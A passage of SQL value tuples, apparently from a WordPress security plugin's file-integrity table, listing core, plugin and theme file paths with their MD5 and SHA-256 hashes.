(0xb66b0dd585f8655c505d1e322913062d, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tabs.php', 0, 0x88ca021a904e6e78789ffd9c1c18d3dc, 0x88ca021a904e6e78789ffd9c1c18d3dc, 0xb8aab6b6b543342506c6c045073b65e6f5bb2845e8fbadc954b11da2707dd84e, '', 0, '?'),
(0xb672815cd96a0694b4a8f2e141241381, 'wp-includes/js/customize-base.js', 1, 0x00000000000000000000000000000000, 0x811878a3509b308b50bc004360e5eec7, 0xcb0721c65a91b4c58b88efda4236833e0d6c9f283d0ff4786e4321e23ddbfef4, '', 0, '?'),
(0xb698c003e38ec622530ccead60137440, 'wp-admin/network/plugins.php', 1, 0x00000000000000000000000000000000, 0xe4f7cdfcaddc4693fe0bcc39bb55d68a, 0x10580fc3904d43431c440d644a26c0c82d2a3ccbe23498ff5455f9bc261f2078, '', 0, '?'),
(0xb69901759b4d43c539844f6377f73128, 'wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php', 0, 0x6b32a488fff0b5a991a40d8921bff961, 0x6b32a488fff0b5a991a40d8921bff961, 0xc2a881e5ad1026db2bcfbad573c5d81a102dd315f09addb0db631a8c35a38cf5, '', 0, '?'),
(0xb699164b0b3fdcfe72b5e7611d235168, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php', 1, 0x00000000000000000000000000000000, 0x4961bbe3eefdb5ff7f52c99e2578bcbf, 0x10b3b0a74d08fea220e41e620bf780bce9a364c2fd5d46c069f7504f5a7192da, '', 0, '?'),
(0xb69a912293ca23708c84bf497eaadc27, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key2.svg', 0, 0xb9f3d06f27bfbe7f49604ff936a59e25, 0xb9f3d06f27bfbe7f49604ff936a59e25, 0xf59e36f974c9c3808c5293ce1b6403cc1463952bbbaaceb1d2a0a5f18d8d5e3d, '', 0, '?'),
(0xb6a6e25ce4c6012e31b0db2d9cbe0f3a, 'wp-admin/options-media.php', 1, 0x00000000000000000000000000000000, 0x2c18a8e01043d00494d4ba933e1b8f12, 0x4bb70450d8b19f3a9719675514e98c853450c7e384cb6a8ac1e41cd25423685e, '', 0, '?'),
(0xb6b0ce9d48ba012ab6e12a2eda811f53, 'wp-admin/includes/bookmark.php', 1, 0x00000000000000000000000000000000, 0xfeea3367c3ee803baf72e4dac1401983, 0x767d1c98cfefe09d951d4c1284783498913e2baab78db9a8dc9a002497cd57e4, '', 0, '?'),
(0xb6c16478b9cdd66542c0dd9904cf9f35, 'wp-includes/IXR/class-IXR-clientmulticall.php', 1, 0x00000000000000000000000000000000, 0xaf10903340b8ebc353a5050a5face990, 0xf180cdd4d20bf59610219959fc4d78aae51df46debf1d592e9a94ff3b0c5f9bb, '', 0, '?'),
(0xb6e3be150e3e0b300dffbb9a17d1508b, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_power_24px.svg', 0, 0xa212ae1d166081702e2ae60c8f89baf6, 0xa212ae1d166081702e2ae60c8f89baf6, 0x1ab74f26c41486e6f66817cfc53407846e1f17dcb2199eb051ec09a8078c8ccd, '', 0, '?'),
(0xb6eabb10c6d2698633d6853bf502d628, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php', 0, 0x18726d17d12de713b67cd5d649290cd8, 0x18726d17d12de713b67cd5d649290cd8, 0x3a38da6e796b4eed15a3c3fd85d1e0c4da7fad3928fc80a24869b89ff6b442e0, '', 0, '?'),
(0xb6eea4556c31c0c89544fc626d67f1af, 'wp-includes/css/buttons-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x14e17b025e68cf83f453b0cf43b0d0c1, 0xf85cd16e6ca2a35dc18bf5c43eee0df7897df249e0a5f975534700b7bccaa7b1, '', 0, '?'),
(0xb6f50883cf8fdfc552434f68a599dadf, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php', 1, 0x00000000000000000000000000000000, 0x30a5d8369ea2012e747ac1e59f78c76f, 0xf6e03bdd03feaf705e00ac9d3306bfd4b9e2288020898e41fedfce61b4ecc577, '', 0, '?'),
(0xb6f5f5d55437a2ead5da62a405312a2a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character03.svg', 0, 0x65babe55179e7ca60205fc7a30e8272b, 0x65babe55179e7ca60205fc7a30e8272b, 0x07c6a02fa12af65eccab57e0ad72ad3a4bb8b59118e4b786eb4131c37ae1442c, '', 0, '?'),
(0xb70a6676a038a6f7e1310eb793992d49, 'wp-includes/SimplePie/Exception.php', 1, 0x00000000000000000000000000000000, 0x094bfd76269c9fcc3c5cda8f05d05335, 0xfa77e227e48ac654fccb4f1545191ea35bb81b713ae9536b21a9a420cb8ef35c, '', 0, '?'),
(0xb71807cad97418412664f7d8fa0836da, 'wp-content/plugins/js_composer/include/classes/core/shared-templates/importer/class-vc-wp-import.php', 0, 0x0878f8e824bc6e942fd7a867fba9293f, 0x0878f8e824bc6e942fd7a867fba9293f, 0x3514b7ffe518970c10b7f1ae2c42ba8dfa0b54afb3f15f42fe4a7c166daee866, '', 0, '?'),
(0xb74685115bafcde3b58b50d1b39140bb, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php', 1, 0x00000000000000000000000000000000, 0x4dc2628d5022d1198a78d9594030f1e0, 0xf727c8c2d66ea9b22a326ed48be4f2e98ae429d861288c5ff7491f718cc9987b, '', 0, '?'),
(0xb75617745162d0a8b8c1b0f338da2db0, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid.php', 0, 0xd893b8d261152972b673160e84aa4e17, 0xd893b8d261152972b673160e84aa4e17, 0xff4adb006e83f3d0271dafc1b584beead53387957c785d1444d232841aac35c5, '', 0, '?'),
(0xb75d9a7b642ef64541bc704bbd7bcdf7, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_link_24px.svg', 0, 0xb060f37404ecad879591b0fd4af12ff4, 0xb060f37404ecad879591b0fd4af12ff4, 0x166dd816da2ee71e3c59198ef43fcccd3fa66e881a606afd087883d5688315b0, '', 0, '?'),
(0xb7609960271bce6c603de8eaa2065828, 'wp-content/plugins/wordfence/views/options/option-select.php', 1, 0x00000000000000000000000000000000, 0x71a9cc35db438e94e301ec83ce26edac, 0xc2635533d04118eb570a8d0bb20428d83a871646cccdcc407a416747268a6a39, '', 0, '?'),
(0xb765007389a3f80a3efc1c22b10b1197, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_color_24px.svg', 0, 0xf3e97cb19ad948588e7ad78bbad9a155, 0xf3e97cb19ad948588e7ad78bbad9a155, 0x7f934912f30eb0299ab20b7d09a64ad3c87ca679aa72cb87eaf95d65c245278a, '', 0, '?'),
(0xb76aa318bb4847e8fcd2fdea772cc699, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_1_bar_24px.svg', 0, 0xe9fd2e8ce2ef1faa13c1e736ab25883d, 0xe9fd2e8ce2ef1faa13c1e736ab25883d, 0x30beade8b72b937fa13103ac98c958d28def95497d89625040125ce28942f1e8, '', 0, '?'),
(0xb78e963f1a58b3289fed45c89f2225b1, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/html.php', 0, 0xd1a13c667c3047f783cf9a25ea49987b, 0xd1a13c667c3047f783cf9a25ea49987b, 0xa19706c2663aef28c759e2fdd6d4be6944aee4d32c43dc47da63826921ddf205, '', 0, '?'),
(0xb793684a96b444d2e3b09747a520f66e, 'wp-content/plugins/wordfence/lib/wfCentralAPI.php', 1, 0x00000000000000000000000000000000, 0xc48389afb203615c1280f0c746af05f8, 0xeae321d0298a2d352578cc693dbab4ad8b46a4249cb0eec10f3037c37ecb120a, '', 0, '?'),
(0xb79b029c5a5134c7d85c012882dc8713, 'wp-admin/network/admin.php', 1, 0x00000000000000000000000000000000, 0x48f1fe3370f9d713b027655b6785e694, 0xc9147a8913d2460ad67e93f596166f45925e71ea0d16191bb1b8cee949b3d248, '', 0, '?'),
(0xb79fe3ba115e3da2e9879927517278db, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-contact-form7.php', 0, 0xdcc364c7a69f9185d0f6627cd0021c37, 0xdcc364c7a69f9185d0f6627cd0021c37, 0x9dcc19e3d97542b192eab097fc4e255cdaa0a1039dcb41c361762ea99f579400, '', 0, '?'),
(0xb7a518394fa09daae6133e87dbc6ccb2, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart2.svg', 0, 0x660d913f1f9667b80ec5cc7b330e17a3, 0x660d913f1f9667b80ec5cc7b330e17a3, 0x885f616942cd9b5054ba908c8c4e7a12f01dde6d849b49698c23288d6e410ae3, '', 0, '?'),
(0xb7d55b05308df15e8b9faa8cd002b617, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php', 1, 0x00000000000000000000000000000000, 0x65ba6d67ebdd9c7cf93cebbcb844680b, 0x992bc18d25dd47b83c74b3315deb83490719f2356db71a9e7dafe245f63ef03b, '', 0, '?'),
(0xb7ef2feff6d88a21a4064e3ef1820afe, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php', 1, 0x00000000000000000000000000000000, 0x0eda1ea266183c5f3212535e49bfaa5a, 0xfdad69ddaf99ff387b1c918169fcb4d8712164bea0ccd58da8e541047af2f5a9, '', 0, '?'),
(0xb7f915ce2db4d42527de43c079b112ff, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_vignette_24px.svg', 0, 0x42af7520458bbc07c475626f903e6416, 0x42af7520458bbc07c475626f903e6416, 0xb0913efec0dfac93a91c8efcdd47a5d9926d4653e885c1a6578415c582bf962d, '', 0, '?'),
(0xb81ae413a1af6ceecedef93317c88ac2, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff', 1, 0x00000000000000000000000000000000, 0x50c955d592e8a54a0e4cb4936d386076, 0xd39bfa7651b4966be2c40ab9836cd85ddb60ce95ba8fdbb7f4952b7dd26b4fad, '', 0, '?'),
(0xb84369ae4a644944cc7244fab85dec70, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_arrow_24px.svg', 0, 0x7674a1b6339f05fca47f1dda9b3f7880, 0x7674a1b6339f05fca47f1dda9b3f7880, 0x5f205b6812a953975b7fd73f18de6b4c0b44512585834e7299e3151d2bedd2aa, '', 0, '?'),
(0xb84a7c0601367dcb0c50df2c020dd99b, 'wp-admin/css/colors/_admin.scss', 1, 0x00000000000000000000000000000000, 0x4d7f7857bc064daeb85cad30ff0feeab, 0xee19fb71288fff0079d11a84f0dc748982210e2ea6b696586d8dbccc15715fec, '', 0, '?'),
(0xb8646023293f9ecfb39acf30287787f9, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php', 1, 0x00000000000000000000000000000000, 0x20c16f59830ba2db2de31729451d4864, 0x6cdc2c38bf45f154978e439165796c9e61f95304eed43b29272264cc607afb99, '', 0, '?'),
(0xb88c789660fe662c3565661932fd1293, 'wp-admin/js/site-health.min.js', 1, 0x00000000000000000000000000000000, 0xc999b140e1d7d2c45c7c70f6bbcb99e2, 0x4362bf200d3ed321322e95bb29d0f93b7c8bc19eccacc9e9e66d2c134605919d, '', 0, '?'),
(0xb88e94a79c5bae8f3a81b09784850f71, 'wp-admin/includes/class-wp-plugins-list-table.php', 1, 0x00000000000000000000000000000000, 0x787443a5ec118e3ae2271bdf79c34b7b, 0xadf234e6754aba98bed68f0943d10ec7e5627f50054de1d0591afee1406087a0, '', 0, '?'),
(0xb895d315a58de643840dfa5802e5c901, 'wp-content/plugins/js_composer/include/templates/params/google_fonts/template.php', 0, 0xa769c80cedfc468135c4d29395ccf05f, 0xa769c80cedfc468135c4d29395ccf05f, 0x8796676bf16c1b63ea2b91dedb98ffe6a92b3772a7ef2dbc51562520dadd70ba, '', 0, '?'),
(0xb89a8550bf174f663bf699cd2ff317d7, 'wp-includes/SimplePie/Decode/HTML/Entities.php', 1, 0x00000000000000000000000000000000, 0x45975e2fcf0d428691a55a2394252f61, 0x002bbdf93085dfa8503bb5504f860b27a0895e707c4e73a64e369264b4d70bef, '', 0, '?'),
(0xb8a0b28aaf05ed6e9c089ebec4c2225e, 'wp-content/themes/Impreza/framework/functions/enqueue.php', 0, 0x8f76ff5514837968c0285609681339fa, 0x8f76ff5514837968c0285609681339fa, 0x3c92caa11f6d2c61d8c5e9337f548a0c153ed351e1807625264ee148fa44b8b1, '', 0, '?'),
(0xb8adfe83b91d51dce163259a67af8292, 'wp-content/plugins/revslider/admin/assets/imports/sportshero/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xb8af289a42eaf8690623f30a6b886f6c, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_unselected_24px.svg', 0, 0x60c299daf8e8c7cc8302d7cb7ef366d6, 0x60c299daf8e8c7cc8302d7cb7ef366d6, 0x733d3525aa6db6a2f71334c4f58890a6426a2b8b38e915514b4498b19a176a3f, '', 0, '?'),
(0xb8c6a22258c6a3d36c0152f20586d5a1, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank2.svg', 0, 0x577b7a253d542fc43788c82b2f85f0bb, 0x577b7a253d542fc43788c82b2f85f0bb, 0x32dd5ffb29d9f2620410f4a162b416a1c35e50680c89f4a71fbcf19f13b3504d, '', 0, '?'),
(0xb8db5a8acc280293c513a77c9fcd5a07, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php', 1, 0x00000000000000000000000000000000, 0x5155ff707e6f63c38a1e34d24e749bfb, 0x94114ccede6eb56c3240ce90f63e689a692c754a59b248a6895ce34cf42cb242, '', 0, '?'),
(0xb8e8ab5c20af9449d1bbc1bbe819162c, 'wp-includes/class-simplepie.php', 1, 0x00000000000000000000000000000000, 0x0dbef394a91127f068ac8fdd587d4895, 0x673251c6b65a36f3fcc3edfbe92af58154f554b1d0a2a00f94155fc45338eeb0, '', 0, '?'),
(0xb8ec7c53c3cb343a846c08a9c5aa85b9, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_circle_24px.svg', 0, 0xf06544a35c17ac3d821f8fcdbffb1a54, 0xf06544a35c17ac3d821f8fcdbffb1a54, 0xab3e7d07002c22252000d9256e9173c18b86658f32c9d18098ae865bf0d9d379, '', 0, '?'),
(0xb90737efab33b8680dfd99c34333702e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_record_voice_over_24px.svg', 0, 0x4ba638173892f4c67772f4fc6d82f2c8, 0x4ba638173892f4c67772f4fc6d82f2c8, 0x4577ca7400087479366d82070712c96b8a5830369f31e54004f725a9b86887aa, '', 0, '?'),
(0xb92c5c9ddea770d289885e76f9d3e5b7, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_sd_storage_24px.svg', 0, 0xf2af241412f14eac6fd749d867d542fa, 0xf2af241412f14eac6fd749d867d542fa, 0xea67c46c08cefda5f8f2beea9a2084ec37a849a4dbd581e9e3e0c419413d12a1, '', 0, '?'),
(0xb92d3fd95f1c9e1529c84876e36c6873, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_not_24px.svg', 0, 0x17ec4223aa52a2254290b7e9d361a79a, 0x17ec4223aa52a2254290b7e9d361a79a, 0x26440d1c448b62845e02d44b0ab9ba5a087b30e9426030c500e98123bbac9a85, '', 0, '?'),
(0xb92f26bc8ed6fbe132aed1a10d674473, 'wp-includes/http.php', 1, 0x00000000000000000000000000000000, 0x72b6cbb139bc86aa835fe03c6d30eadb, 0x054fab92d26c1765105a3b8717ca0f4c502d3947ea70adb0900feea6afa88023, '', 0, '?'),
(0xb935d98261dca8cf98d2092389e56275, 'wp-includes/js/dist/compose.min.js', 1, 0x00000000000000000000000000000000, 0x90a33c0e9b6ef96958972ca75e65f7bb, 0xa5df790598f8a3301145874d2879472bcf88fab0b9104307d88aa05032295070, '', 0, '?'),
(0xb96eeac8503f7a4852d6adf38e465f11, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_8.php', 0, 0xc6fb893420393b0c8ba917a7a646b0ad, 0xc6fb893420393b0c8ba917a7a646b0ad, 0x74c4dabb0d7ecd3a3d224bb9ee98fe2b80b344bcb19e3cbb61c80ebab4519fb0, '', 0, '?'),
(0xb982af08b6173dcde5d1b606cd3824fa, 'wp-includes/js/dist/vendor/wp-polyfill-node-contains.js', 1, 0x00000000000000000000000000000000, 0x8e8cdd77e6e80407255b55c41dc533a6, 0x457495bf9fa0b2d07ac8de66443a783fc1edc6fb6f96e18d63f8da8b05093850, '', 0, '?'),
(0xb98c3f83307cc3f6e03575c6a18301be, 'wp-admin/custom-background.php', 1, 0x00000000000000000000000000000000, 0x1263b5886047f8dc10ac8d025bbfc99e, 0x745b4076d26ced3bc47aa09ae704f49f3095b129c2c627131b2c71abb1cc4c02, '', 0, '?'),
(0xb98e50d42449f1660a0af04e8d056c45, 'wp-content/themes/Impreza/framework/shortcodes/vc_row_inner.php', 0, 0x1665ff16ec2f057060c8cfe9c5cd67a9, 0x1665ff16ec2f057060c8cfe9c5cd67a9, 0xf80fa20a44a78b7511815779a22d716def6eef8107780bbfcd1c71aad65e6f4d, '', 0, '?'),
(0xb991e0e3fbed1f25a89be2a295093b57, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_flickr.php', 0, 0x538356f420bb3f70cf6fa85de38f415e, 0x538356f420bb3f70cf6fa85de38f415e, 0x477626ab1ed28af2685150bf68db00fe209f0a864945ebb75a245344445c42fc, '', 0, '?'),
(0xb9a0fdd939b9728c1174fa1957da25b4, 'wp-content/themes/Impreza/framework/plugins-support/tablepress.php', 0, 0xe9ae9b914a76e577c785791ef4b28dbc, 0xe9ae9b914a76e577c785791ef4b28dbc, 0x70c90c62385a5203af888b2bc3599ee1de66816181467ec7c568e0e61e5293dd, '', 0, '?'),
(0xb9aae6e03d5194d8dc952dd9aacfd758, 'wp-content/themes/Impreza/framework/templates/form/textarea.php', 0, 0xc7fd654652b87ddd2f3c780677560498, 0xc7fd654652b87ddd2f3c780677560498, 0xc74db728304b1ef4a2f6cbd05e26044f33c21aa9048d58f9dc1ace0f8026fe91, '', 0, '?'),
(0xb9ac8c1fa89d0f8ccbd1182568bdd75a, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_person_add_24px.svg', 0, 0x135c11e21f2a8eaf12c77332ac2a490f, 0x135c11e21f2a8eaf12c77332ac2a490f, 0xdab538f9a02d0312d5e6b6f1b94a0b61f9cb917d2551a0f4f7e26b921fa0e9e8, '', 0, '?'),
(0xb9ae8315710168cc6e9b1d0c4afd6aaf, 'wp-admin/css/nav-menus.css', 1, 0x00000000000000000000000000000000, 0xa87557e7840940783e60c7877e2a1799, 0x0fd7a6bdd1b27311cbc9542e999077127aef836a160a4031305f85556513c9e8, '', 0, '?'),
(0xb9b9ce3cff09cf6625d56e9f174fb303, 'wp-admin/includes/credits.php', 1, 0x00000000000000000000000000000000, 0x0fdfcca4de49760983ed713b9c8968f2, 0x3737620f7fe6c7a5314ce6b3dbf5c8d4e324cfb8ea0a3ec3053dc0b10b98f35a, '', 0, '?'),
(0xb9c38f754ce72cee9f26c7918b0d311e, 'wp-admin/media.php', 1, 0x00000000000000000000000000000000, 0x7b6dc8dd0401185e6e45f60944a130c1, 0x8934a60f14b83394f2212b8257d58e2ed34516c33bac0511e5db49f95d1b84d4, '', 0, '?'),
(0xb9d380395b07eac04d131b2d1b678982, 'wp-includes/js/dist/hooks.js', 1, 0x00000000000000000000000000000000, 0x6dff5d62e5015eb8cb03988ca4fcfeb0, 0x6c0f864cfa15d2fe72ecc27c5ab00308fe45f487ac049945ccaa5b50d46f6bd9, '', 0, '?'),
(0xb9d42549851189e77d8c50f67a57adc9, 'wp-includes/random_compat/random_bytes_mcrypt.php', 1, 0x00000000000000000000000000000000, 0xb78a54ff0fd4a6ca9960b550a7a54c14, 0xe5623daf062d2eb993b458ffc0ee94ce1ffe54fcc5f259016e9ed0d050e6ed84, '', 0, '?'),
(0xb9f3b4051e8789178637eb61fd03dd92, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_outline_24px.svg', 0, 0xb2919eeccc07bc4f329f3e4330efae39, 0xb2919eeccc07bc4f329f3e4330efae39, 0xf4178e61e4e13fb33835c815ae17fcd75d8af37e877cdf6c8a733b6dbe7f1422, '', 0, '?'),
(0xb9f5f1f3dccd27370f3534899c2ee553, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/button.min.js', 0, 0xd0274f4006bc9aaa1008cf052fa6a217, 0xd0274f4006bc9aaa1008cf052fa6a217, 0xcb844a17263cfc77cd101a36ec2cbf87a01642da05b7c388f1a5da31b27ff597, '', 0, '?'),
(0xb9f886779deadc5f9a39c2f84d7a4702, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_hotel_24px.svg', 0, 0xca31aa3cf29113696fa620de1de6d358, 0xca31aa3cf29113696fa620de1de6d358, 0x687ace9d26bae7d43a492b39807e43dc7940b116c94a1d2f7332f914a0690a17, '', 0, '?'),
(0xba05c578d071fb06cdc7afb7429d5016, 'wp-content/themes/Impreza/framework/shortcodes/us_contacts.php', 0, 0x1bad22a108d4ca2c146ebb33ad65d253, 0x1bad22a108d4ca2c146ebb33ad65d253, 0xa83631e6a2d668ca1f10f11ad2cc563d706ee3c0abe2fd9d80dfdffcf7142102, '', 0, '?'),
(0xba28647749003a0dcec0d75878314443, 'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php', 1, 0x00000000000000000000000000000000, 0x795f565e0fc10a258ca38b701dfdca63, 0x6457a2670bb86d65cbb035b1ff17e3fad6d2a0c703a93aae3bb38dd057e127d5, '', 0, '?'),
(0xba2f517f3e2bc6de9d04062cd26d2d2f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-exclamation.svg', 0, 0x926092856f050d534329b230ea8a4be2, 0x926092856f050d534329b230ea8a4be2, 0x7201d1f13265c4a78ede35d22839433e5bb5d0e4bed8369d2e577b9ed4e6866f, '', 0, '?'),
(0xba339e2c9298d763768b6b969205d1f8, 'wp-content/plugins/wordfence/views/onboarding/overlay.php', 1, 0x00000000000000000000000000000000, 0xe2139269c5aef439f56560f8d01632ee, 0x5ab5b4ff4dcb47584c3b24784d0f697c51e825a1b2ddc5bd5932dc191ead245f, '', 0, '?'),
(0xba574ded8acb7b68a916f8dac0289d9e, 'wp-content/plugins/wordfence/lib/menu_options.php', 1, 0x00000000000000000000000000000000, 0x24b75368a10c44b6ff4d2d36833271a2, 0x681a4661018ab13e84debbaa987b5f9fc5f42bd542a02d1e95a4054f19402017, '', 0, '?'),
(0xba5d4b1c7bccd9af07bce660d87bbf2c, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff', 1, 0x00000000000000000000000000000000, 0x2b45d2594815cded8f3c59504b3db053, 0xdb8bfc1f26f23a5ec1fdb147bfcdd72642888c840b32c3504387bf7ef7aff285, '', 0, '?'),
(0xba61c9406f9bff27bfc96b62edfe0ef9, 'wp-includes/js/jquery/jquery-migrate.min.js', 1, 0x00000000000000000000000000000000, 0x7121994eec5320fbe6586463bf9651c2, 0x15de7cd602e503e300bb16efa232e88b2b9aeb4175f3c9f0646d11e33584c789, '', 0, '?'),
(0xba63f8cd6dfab31077164d8ccdb36641, 'wp-content/plugins/js_composer/assets/lib/bower/twbs-pagination/jquery.twbsPagination.min.js', 0, 0xb0afc490541fd4ebbebcaad883635522, 0xb0afc490541fd4ebbebcaad883635522, 0x58774ac155745299dc0a52f76041414517bcbac3185c44cdcbc73c71cf2770ba, '', 0, '?'),
(0xba8a692f128a704574f0b50addf76cf8, 'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php', 1, 0x00000000000000000000000000000000, 0x0ef6ec9ae6356f51c134a12964c85417, 0xbe4493f87433761a25b3ed6a6c859a6625861b1efd4f299bfd8526160f26314c, '', 0, '?'),
(0xba92cfeb32ffca0f3f21e075d8dc8622, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php', 1, 0x00000000000000000000000000000000, 0x849f5b2841c98aceed84d6c9fb9568fc, 0xfea387f0cdb3df98935136cca8212af403c7d758e478caf507c34d4d16ad7540, '', 0, '?'),
(0xbaa9c214e3125e5b5892e68e69b309ed, 'wp-admin/themes.php', 1, 0x00000000000000000000000000000000, 0x833df8de1b367277caab7dde370c2936, 0x07350020fcad6267dfdbf157963df9c0b11b2e8bf76586fdc4e484474d548f7f, '', 0, '?'),
(0xbaad3ae6c058a9bc40007b2ac5d6afa6, 'wp-admin/includes/class-language-pack-upgrader-skin.php', 1, 0x00000000000000000000000000000000, 0x16a9faccfd318b4b02a1f0fef5d66425, 0xcd4927f5e94af738cbb57597ee5ff00d99cf6c1ef784509fbfd3ca5e060734a7, '', 0, '?'),
(0xbabc3454b828e2045c39278ce433b129, 'wp-admin/css/customize-widgets-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xdd3522e0b40b9053c20ddfb4d5f77d3d, 0x30b6074e12d0cf817027062c1e7a295fd18a8a205f451a596d3ba3c3532eb2fb, '', 0, '?'),
(0xbabf87000e6e3a548b717d4b2013f840, 'wp-includes/Requests/Exception/HTTP/408.php', 1, 0x00000000000000000000000000000000, 0x403e3164844958c5144f98ecc8b77689, 0xe971ac99f22ad66c6d4bd2a3136bc422d04dff513fca70a78d9261d882e7a634, '', 0, '?'),
(0xbac64e935f09c54c27fdcd38595a9732, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_2_bar_24px.svg', 0, 0x7dc01d1919df94b30e9c60d19aec1768, 0x7dc01d1919df94b30e9c60d19aec1768, 0xd78f474433b7572a9a704719c7def323b20c88fe5aef13d4140b7ea6835f305a, '', 0, '?'),
(0xbacd6b7b139ae426f211f3bb780ab6f8, 'wp-includes/class-wp-error.php', 1, 0x00000000000000000000000000000000, 0x3deb5b5e23a65fafc2490dbbc548ea6b, 0xa70ca2ac657133d55882fcc7ee6c6e8b6995537654f2a8312236f5fc78194cea, '', 0, '?'),
(0xbadf24e1846f93ac31d60f54b3325d6c, 'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php', 1, 0x00000000000000000000000000000000, 0xfa0bcc0d6d95136ec45a42e2ce20bca5, 0xe4dd83455a123ff677c896de18cd9681731221bd37f4e3a0dd63c74ad0378630, '', 0, '?'),
(0xbae7ba501bc3532ee7b782d2f3af708c, 'wp-content/plugins/js_composer/config/buttons/shortcode-vc-btn.php', 0, 0x54c5b2e607089e0cef745cf715969318, 0x54c5b2e607089e0cef745cf715969318, 0x3bf99ca40430d816cae527c4de61828e75bcf7824d0106fc6fd54f03359c326e, '', 0, '?'),
(0xbaedcc4130668efd6660c2204bc7817d, 'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php', 1, 0x00000000000000000000000000000000, 0x0a2b035a2f5f90ac1a78759de612760f, 0xa2c87591fafc3b1349569795615baf7ee3b5adfe545a5c0b5ee079134a9dac6a, '', 0, '?'),
(0xbb00b2d725335b247800e8e22eb08e28, 'wp-admin/images/marker.png', 1, 0x00000000000000000000000000000000, 0x3313dc2a4f322fd43349329cfde8191e, 0x7e54bc405c8e807655493ce7704bc8d7c4d7616054ba40637f07e31cde6361fc, '', 0, '?'),
(0xbb01a4ff0744bba32c3925628acc5a21, 'wp-content/themes/Impreza/framework/functions/widget_areas.php', 0, 0xacfc44ce01061c169401942760cf29b6, 0xacfc44ce01061c169401942760cf29b6, 0x9d8215edee962b650b30a4d19301a86b65bddae057a46b127123a74c96012c5c, '', 0, '?'),
(0xbb06d202c934fe991cf589f93d8eb811, 'wp-content/plugins/wordfence/images/icons/ajaxScan.gif', 1, 0x00000000000000000000000000000000, 0x91ca96b4d1b4adf77e66fa0efa9e69c1, 0x8fdfa97f1630bcd48df211a3d5d1a6aec6bb480a0f891b958e0f8bc0c2a13bc2, '', 0, '?'),
(0xbb099d2a22f5138fba41dc22c703d112, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_3_bar_24px.svg', 0, 0x383b357ac1fc09a24e8c132337272b00, 0x383b357ac1fc09a24e8c132337272b00, 0xe2fac24b39057e140515c4420c902614f69cc3585876640eaeae7d7172f90c5b, '', 0, '?'),
(0xbb09e6e3e3456d5ba5acb3c7d86cc53c, 'wp-includes/js/tinymce/plugins/image/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x2d94fa5a43e96cc2ad7dc4e88e900fea, 0x79e718e954edd41f4e7a2ba8aa14e38614ade283868ff52708c3f3abfc2559ca, '', 0, '?'),
(0xbb0a1c26cfd3480035c129335c3032b3, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_circle.php', 0, 0x7db75b093b9cf9ab577ee8dbbaaa3a76, 0x7db75b093b9cf9ab577ee8dbbaaa3a76, 0x93e9384d7b0d58b36815e30dc61b1251dbfdc6bcb2d9136ae2202c43300a74c0, '', 0, '?'),
(0xbb35cfbf455b313acc2a0eb38f653df5, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/jquery-appear.js', 0, 0x26466df996a4fd7ff406adecb6f77e91, 0x26466df996a4fd7ff406adecb6f77e91, 0x22adfc9019f0be0557ab751e2c5afcef0bfc0f1ec015a95b99b8cad4dd4ab366, '', 0, '?'),
